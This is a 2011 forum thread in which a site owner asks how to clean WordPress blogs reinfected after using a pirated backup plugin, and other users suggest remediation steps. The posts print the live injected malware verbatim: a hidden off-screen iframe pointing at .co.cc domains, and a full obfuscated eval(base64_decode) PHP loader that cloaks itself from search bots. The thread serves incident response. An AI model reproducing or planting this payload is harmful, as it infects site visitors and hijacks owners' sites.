1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

My blogs are hijacked with iframe injection - Please help!

Discussion in 'Black Hat SEO' started by air360, Feb 26, 2011.

  1. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    Ok, so it's kind of my own fault i suppose...but i grabbed a copy of the backupbuddy from one of the threads here to clone a blog...worked like a charm and then i went to the website and i got warned that there was malicious code detected. after looking at the source i have this at the top even above the header:

    Code:
    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://gwqagehfdjhfd.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="10" height="10"></iframe></div>
    I then noticed that it had infected every blog I have hosted on my server. I immediately deleted everything related to backupbuddy off and went through and uploaded clean copies of index.html and thought I was good...but a few hours later I noticed it had modified all my index.html files again and was back (with a different url)

    I have now changed my ftp password and reuploaded a new index file and checked again for anything related to the backupbuddy that i could find...but im afraid it may come back again.

    Does anyone know how I can get rid of this stupid thing? Its gonna kill everyone one of my sites!
     
  2. sqhunter

    sqhunter Regular Member

    Joined:
    Jul 8, 2009
    Messages:
    385
    Likes Received:
    267
    You may have to hire a guy from freelancer sites and pay 30-50$ if the problem is deeply entrenched in your sites.
     
  3. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    Are there any steps or things i can do on my own to try and figure out where its coming from?
     
  4. cyberroot

    cyberroot BANNED BANNED

    Joined:
    Jul 24, 2010
    Messages:
    345
    Likes Received:
    72
    in most cases iframe injections inject them self in database check database once and header files of php what are they calling u i m sure will find the infection root !
     
  5. BugFixed

    BugFixed Junior Member

    Joined:
    Sep 24, 2010
    Messages:
    130
    Likes Received:
    39
    Check header and footer, plugins, theme. Compare them with the original.
    From database side, find that string like "co.cc", delete it if it's there.
     
  6. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    hmmm when I do a search for "co.cc" on Information_schema it finds it (it even found the whole url) but i wont let me delete from IS so I am trying to find which database it is in...and so far those are all showing 0 for "co.cc"
     
  7. arbydee2

    arbydee2 Regular Member

    Joined:
    Mar 20, 2010
    Messages:
    413
    Likes Received:
    223
    Location:
    127.0.0.1
    Home Page:
    This happened to me before when I used a cracked ftp program to upload one of my sites =x
     
  8. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    how did you fix it?
     
  9. arbydee2

    arbydee2 Regular Member

    Joined:
    Mar 20, 2010
    Messages:
    413
    Likes Received:
    223
    Location:
    127.0.0.1
    Home Page:
    deleted all the infected pages and changed my ftp password. Got myself a clean ftp copy as well.
     
  10. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    UPDATE: I found that I had multiple databases that had usernames that I had not created...ones like dh37qe6 ....so I deleted all those users. I found where I can look at running processes in my database and it showed one running process that I think might be related but it would not let me delete it..said it may have already been killed.

    I have now removed my FTP (filezilla) and am redownloading a copy im sure is clean and I have changed my FTP password. Next once I get my ftp program back up and running im going to go replace all the index.html as they all are infected.

    The only thing that worries me is I still have not been able to find or delete any "co.cc" string from any database...it finds "co.cc" in that running process but I cant figure out how to kill it (if its not already killed like it says).

    So even if deleting these odd usernames and removing all the bad code from index I am afraid it is still hidden somewhere that i am not being allowed access to (or to kill)
     
  11. cyberroot

    cyberroot BANNED BANNED

    Joined:
    Jul 24, 2010
    Messages:
    345
    Likes Received:
    72
    co.cc its a running process cant understand do u have shell access ?? if yes is it showing there as a running process in a server ? if yes u can kill that process and install chrootkit , calm antivirus in server and try to clean ur server ... and for information schema are u trying to delete as s user root ? if not login as a root and try again ...
     
  12. CyHead

    CyHead Regular Member

    Joined:
    Apr 6, 2009
    Messages:
    219
    Likes Received:
    65
    Occupation:
    Student
    Location:
    Fiji
    Home Page:
    wow that's lethal. If the malware was really bad they could have done an sql injection into every row/post with the iframe code.
     
  13. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    In mysql the only place i can find a co.cc is in information_schema which shows up like this in search results:

    [​IMG]

    It would let me do anything at all with this record (and I read that IS doesnt allow you to anyways so that was not surprising)

    So i then went and looked at running processes and show this:

    [​IMG]

    And finally, when I try to kill the process I am presented this:

    [​IMG]

    I made sure my user account had complete shell access to everything before checking.

    Maybe its not related...but considering when searching IS was the ONLY place I found co.cc and i even found the parts of the actual iframed url when searching IS i know its in there somewhere...
     
  14. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    this is driving me nuts! I thought I had it clean and then it was back after an hour!! ugh!
     
  15. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    let me just add this....the first line with the iframe is the code that i am seeing on every index.html page...it is the only main difference i see compared to a clean site.

    Code:
    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://gwst3wgsdhsd.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="1" height="1"></iframe></div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
    
    <head profile="http://gmpg.org/xfn/11">
    
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    
    and if i download the infected index.php file and open it locally i get the coded file below:

    Code:
    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2dlc2E0bmZkZmouY28uY2MvUVFrRkJnMEFBUTBNQkEwREVrY0pCUVlOREFBQ0Jnd0hCQT09IiB3aWR0aD0iMTAiIGhlaWdodD0iMTAiPjwvaWZyYW1lPjwvZGl2Pic7DQp9'));
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    Idk if this helps anyone with any suggestions or not...

    Everytime i replace a clean index file it changes back to this within two hours
     
  16. lexblast

    lexblast Junior Member

    Joined:
    Jan 5, 2011
    Messages:
    118
    Likes Received:
    25
    Code:
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2dlc2E0bmZkZmouY28uY2MvUVFrRkJnMEFBUTBNQkEwREVrY0pCUVlOREFBQ0Jnd0hCQT09IiB3aWR0aD0iMTAiIGhlaWdodD0iMTAiPjwvaWZyYW1lPjwvZGl2Pic7DQp9'));
    So that is whats missing from your clean index.php?
     
  17. BugFixed

    BugFixed Junior Member

    Joined:
    Sep 24, 2010
    Messages:
    130
    Likes Received:
    39
    This might help you:
    Code:
    http://hubpages.com/hub/How-To-Remove-The-evalbase64_decode-Virus
     
  18. air360

    air360 Regular Member

    Joined:
    Apr 15, 2007
    Messages:
    428
    Likes Received:
    195
    Yes, but if I view it in the source code it looks like this:
    Code:
    <div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://gwst3wgsdhsd.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNDAACBgwHBA==" width="1" height="1"></iframe></div>
    So what I tried doing was simply replacing index.html with a clean copy of it and it stays clean for about an hour and then it comes right back to having the code again. Only if I look at the actual code itself by downloading the index.php locally do i see it in the base64 form.

    I will try this....the only thing is it only seems to be infecting my index.html. I can also remove it as i just said above but it seems to come back...but i will surely give this a try!

    I use dreamhost btw (i know they kinda suck but they have always been good to me and were the first ones i signed up with a long time ago...so had not really seen the need to switch to the more popular ones...but i might after all this crap)
     
  19. BugFixed

    BugFixed Junior Member

    Joined:
    Sep 24, 2010
    Messages:
    130
    Likes Received:
    39
    If you can't find on a cron jobs, the last possibility is on hosting server level.
     
  20. lexblast

    lexblast Junior Member

    Joined:
    Jan 5, 2011
    Messages:
    118
    Likes Received:
    25
    the index.php is being rewritten and the base64 code is being inserted which translates to what you see in the source.

    This doesnt have to happen via a cron job, it could happen anytime the site is loaded from any number of includes.

    I'd probably start by searching all of the infected sites source code looking for php code that could rewrite the index.php file such as fopen, fwrite, etc.